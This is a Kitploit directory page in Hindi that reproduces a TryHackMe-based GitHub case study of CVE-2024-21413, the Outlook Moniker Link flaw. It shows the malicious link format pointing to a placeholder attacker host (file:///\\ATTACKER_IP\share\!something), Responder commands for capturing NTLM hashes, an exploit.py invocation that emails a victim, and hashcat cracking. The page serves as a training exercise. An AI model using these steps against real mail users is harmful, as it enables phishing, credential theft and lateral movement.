Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Estudo-de-Caso-CVE-2024-21413 — CVE-2024-21413 का एक केस स्टडी। TryHackMe Moniker Link (CVE-2024-21413) रूम को पैरामीटर के रूप में उपयोग किया गया। एक्सप्लॉइट में claude code के साथ संपादन किए गए। | Kitploit
उपकरण/GitHubGitHub/pedro-lucas-melo/estudo-de-caso-cve-2024-21413
पासवर्ड क्रैकिंगभेद्यता विश्लेषणशोषणपार्श्व आंदोलनफिशिंगCTFलर्निंग और शिक्षाईमेल सुरक्षालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubpedro-lucas-melo/estudo-de-caso-cve-2024-21413

Estudo-de-Caso-CVE-2024-21413

CVE-2024-21413 का एक केस स्टडी। TryHackMe Moniker Link (CVE-2024-21413) रूम को पैरामीटर के रूप में उपयोग किया गया। एक्सप्लॉइट में claude code के साथ संपादन किए गए।

रिपॉजिटरी देखें
75 महीने पहलेअभी तक समीक्षित नहीं

CVE-2024-21413 — Moniker Link 🔗💀

Microsoft Outlook RCE + NTLM क्रेडेंशियल लीक

⚠️ कानूनी चेतावनी: यह रिपॉजिटरी केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। सभी प्रदर्शन नियंत्रित और पृथक वातावरण में किए गए हैं। बिना स्पष्ट अनुमति के सिस्टम के खिलाफ इन तकनीकों का उपयोग अवैध और अनैतिक है।


📋 अनुक्रमणिका

  • अवलोकन
  • भेद्यता कैसे काम करती है
  • प्रयोगशाला वातावरण
  • चरण-दर-चरण प्रदर्शन
  • एक्सप्लॉइट स्क्रिप्ट
  • हमले का आरेख
  • शमन और बचाव
  • CVE Breakdown
  • संदर्भ

🔍 अवलोकन

CVE-2024-21413 Microsoft Outlook में एक गंभीर कमजोरी है जो हमलावर को निम्नलिखित करने देती है:

  1. विक्टिम के NTLM क्रेडेंशियल्स लीक करना एक स्वचालित SMB प्रमाणीकरण को मजबूर करके
  2. लक्ष्य मशीन पर दूर से कोड निष्पादित करना ई-मेल में एक दुर्भावनापूर्ण लिंक के माध्यम से

"Moniker Link" नाम Component Object Model (COM) Monikers — स्ट्रिंग द्वारा ऑब्जेक्ट को संदर्भित करने का एक विंडोज तंत्र — के शोषण से आया है, जो Outlook की file:// लिंक्स के खिलाफ सुरक्षाओं को बायपास करता है।


🧠 भेद्यता कैसे काम करती है

समस्या: Protected View को बायपास करना

आमतौर पर, Outlook file:// लिंक्स को ब्लॉक करता है जो नेटवर्क संसाधनों की ओर इशारा करते हैं, एक सुरक्षा चेतावनी (Protected View) प्रदर्शित करता है। खामी Outlook द्वारा उन URL को संसाधित करने के तरीके में है जिनमें ! वर्ण होता है — एक Moniker विभाजक।

शोषण

एक दुर्भावनापूर्ण लिंक इस प्रारूप में:

root@kitploit:~
file:///\\ATTACKER_IP\share\!something

! वर्ण Outlook के पार्सर को URL को COM Moniker संदर्भ के रूप में व्याख्या करने का कारण बनता है, सामान्य सुरक्षा जाँचों को अनदेखा करते हुए। परिणाम:

  • विक्टिम की मशीन हमलावर के सर्वर पर SMB के माध्यम से स्वचालित रूप से प्रमाणीकृत करने का प्रयास करती है
  • इस प्रमाणीकरण के दौरान, विक्टिम का NTLM हैश प्रेषित होता है
  • इस हैश का उपयोग Pass-the-Hash हमलों में या ऑफलाइन क्रैकिंग में किया जा सकता है

सरलीकृत प्रवाह

root@kitploit:~
हमलावर ई-मेल भेजता है → विक्टिम लिंक पर क्लिक करता है → Outlook "!" के साथ URL संसाधित करता है
→ Protected View बायपास → स्वचालित SMB कनेक्शन → NTLM हैश कैप्चर

🖥️ प्रयोगशाला वातावरण

इस केस स्टडी को सुरक्षित रूप से पुन: पेश करने के लिए:

मशीनऑपरेटिंग सिस्टमभूमिका
हमलावरKali LinuxSMB लिसनर + एक्सप्लॉइट
लक्ष्यWindows 10/11 जिसमें कमजोर Outlook हैविक्टिम

महत्वपूर्ण: एक पृथक नेटवर्क (VirtualBox/VMware में NAT या Host-Only) का उपयोग करें। वास्तविक नेटवर्क पर कभी न चलाएं।

आवश्यक उपकरण

root@kitploit:~
# Responder — हैश कैप्चर के लिए SMB/HTTP लिसनर
sudo apt install responder

# Python 3 — एक्सप्लॉइट चलाने के लिए
python3 --version

# मशीनों के बीच कनेक्टिविटी जांचें
ping <IP_Lक्ष्य>

🚀 चरण-दर-चरण प्रदर्शन

चरण 1 — हमलावर मशीन का IP पहचानें

root@kitploit:~
ip a | grep inet
# उस इंटरफ़ेस का IP नोट करें जो लक्ष्य से संचार करता है (जैसे: 192.168.56.10)

चरण 2 — Responder शुरू करें

Responder एक नकली SMB सर्वर बनाता है जो NTLM प्रमाणीकरण हैश कैप्चर करता है।

root@kitploit:~
sudo responder -I eth0 -v
# eth0 को अपने नेटवर्क इंटरफ़ेस से बदलें

अपेक्षित आउटपुट:

root@kitploit:~
[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-लक्ष्य\उपयोगकर्ता
[SMB] NTLMv2-SSP Hash     : उपयोगकर्ता::DESKTOP-लक्ष्य:...

चरण 3 — एक्सप्लॉइट चलाएं

root@kitploit:~
python3 exploit.py \
  --sender हमलावर@डोमेन.com \
  --recipient विक्टिम@डोमेन.com \
  --server <IP_ईमेल_सर्वर> \
  --attacker-ip 192.168.56.10

चरण 4 — विक्टिम के लिंक पर क्लिक करने की प्रतीक्षा करें

जब विक्टिम ई-मेल खोलता है और लिंक पर क्लिक करता है, तो Responder स्वचालित रूप से NTLM हैश कैप्चर करता है। इस हैश का उपयोग किया जा सकता है:

  • समझौता किए गए खाते की पहचान करने के लिए विश्लेषण
  • Pass-the-Hash में नेटवर्क में पार्श्व प्रमाणीकरण के लिए
  • Hashcat/John को ऑफलाइन क्रैकिंग के प्रयास के लिए भेजना:
root@kitploit:~
hashcat -m 5600 hash.txt wordlist.txt

🐍 एक्सप्लॉइट स्क्रिप्ट

पूर्ण और टिप्पणी की गई स्क्रिप्ट के लिए exploit.py फ़ाइल देखें।


📊 हमले का आरेख

हमले के पूर्ण प्रवाह के इंटरैक्टिव विज़ुअलाइज़ेशन के लिए diagrama-ataque.html फ़ाइल देखें।


🛡️ शमन और बचाव

पूर्ण शमन और बचाव गाइड के लिए MITIGACAO.md फ़ाइल देखें।


📄 CVE Breakdown

कमजोरी के विस्तृत तकनीकी विश्लेषण के लिए CVE-BREAKDOWN.md फ़ाइल देखें।


📚 संदर्भ

  • Microsoft Security Advisory — CVE-2024-21413
  • Morphisec — Moniker Link Research
  • TryHackMe — Moniker Link Room
  • Responder Tool — GitHub
  • NTLM Authentication — Microsoft Docs
  • NVD — CVE-2024-21413

👤 लेखक

यह केस स्टडी TryHackMe के माध्यम से आक्रामक सुरक्षा में व्यावहारिक प्रशिक्षण के भाग के रूप में विकसित की गई है।

यह परियोजना जिम्मेदार प्रकटीकरण और नैतिक हैकिंग के सिद्धांतों का पालन करती है। यहाँ मौजूद सभी सामग्री शिक्षा और सुरक्षा स्थिति में सुधार के उद्देश्य से है।

टूल डाउनलोड करें
क्षेत्रविवरण
CVECVE-2024-21413
प्रकटीकरण13 फरवरी 2024 (Patch Tuesday)
CVSS स्कोर9.8 (गंभीर)
उत्पादMicrosoft Outlook
प्रकारRCE + क्रेडेंशियल लीक (NTLM हैश)
वेक्टरनेटवर्क / ई-मेल (बिना पूर्व प्रमाणीकरण के)
इंटरैक्शनउपयोगकर्ता से इंटरैक्शन आवश्यक (लिंक पर क्लिक करना)
उपनामMoniker Link